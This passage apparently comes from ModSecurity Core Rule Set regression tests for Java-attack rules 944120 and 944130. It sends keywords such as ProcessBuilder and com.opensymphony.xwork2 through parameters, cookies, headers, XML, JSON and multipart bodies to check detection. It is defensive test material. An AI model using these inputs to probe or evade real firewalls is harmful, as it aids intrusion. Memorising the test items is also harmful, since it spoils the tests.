"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944120\"" - test_title: 944120-127 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-128 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-129 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=ProcessBuilder.evil.whileclosure" output: log_contains: "id \"944120\"" - test_title: 944120-130 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" output: log_contains: "id \"944120\"" - test_title: 944120-131 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" output: log_contains: "id \"944120\"" - test_title: 944120-132 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-133 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/json {"ProcessBuilder.evil.whileclosure": "test"} -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-134 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" - test_title: 944120-135 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" method: "POST" version: "HTTP/1.0" data: | -----------------------------thisissparta Content-Disposition: form-data; name="payload" Content-Type: application/xml ProcessBuilder.evil.whileclosure -----------------------------thisissparta-- output: log_contains: "id \"944120\"" ����������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml��������0000664�0000000�0000000�00001256264�14461225151�0027706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944130.yaml" description: "Positive tests for rule 944130" tests: - test_title: 944130-0 desc: "Argument test includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-1 desc: "Argument name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2=test" output: log_contains: "id \"944130\"" - test_title: 944130-2 desc: "Cookie test includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=com.opensymphony.xwork2 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-3 desc: "Cookie name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: com.opensymphony.xwork2=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-4 desc: "Request header test includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: com.opensymphony.xwork2 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-5 desc: "XML attribute value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-6 desc: "XML element value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-7 desc: "Nested XML element value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-8 desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=com.opensymphony.xwork2" output: log_contains: "id \"944130\"" - test_title: 944130-9 desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"com.opensymphony.xwork2\"}" output: log_contains: "id \"944130\"" - test_title: 944130-10 desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"com.opensymphony.xwork2\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-11 desc: "Argument test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-12 desc: "Argument name includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache=test" output: log_contains: "id \"944130\"" - test_title: 944130-13 desc: "Cookie test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=com.sun.org.apache method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-14 desc: "Cookie name includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: com.sun.org.apache=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-15 desc: "Request header test includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: com.sun.org.apache method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-16 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-17 desc: "XML element value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-18 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-19 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=com.sun.org.apache" output: log_contains: "id \"944130\"" - test_title: 944130-20 desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"com.sun.org.apache\"}" output: log_contains: "id \"944130\"" - test_title: 944130-21 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"com.sun.org.apache\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-22 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-23 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream=test" output: log_contains: "id \"944130\"" - test_title: 944130-24 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.BufferedInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-25 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.BufferedInputStream=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-26 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.io.BufferedInputStream method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-27 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944130\"" - test_title: 944130-28 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-29 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-30 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedInputStream" output: log_contains: "id \"944130\"" - test_title: 944130-31 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.io.BufferedInputStream\"}" output: log_contains: "id \"944130\"" - test_title: 944130-32 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.io.BufferedInputStream\": \"test\"}" output: log_contains: "id \"944130\"" - test_title: 944130-33 desc: "Argument test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.io.BufferedReader" output: log_contains: "id \"944130\"" - test_title: 944130-34 desc: "Argument name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.io.BufferedReader=test" output: log_contains: "id \"944130\"" - test_title: 944130-35 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.io.BufferedReader method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-36 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.io.BufferedReader=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944130\"" - test_title: 944130-37 desc: "Request header test includes keyword java.io.BufferedReader" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 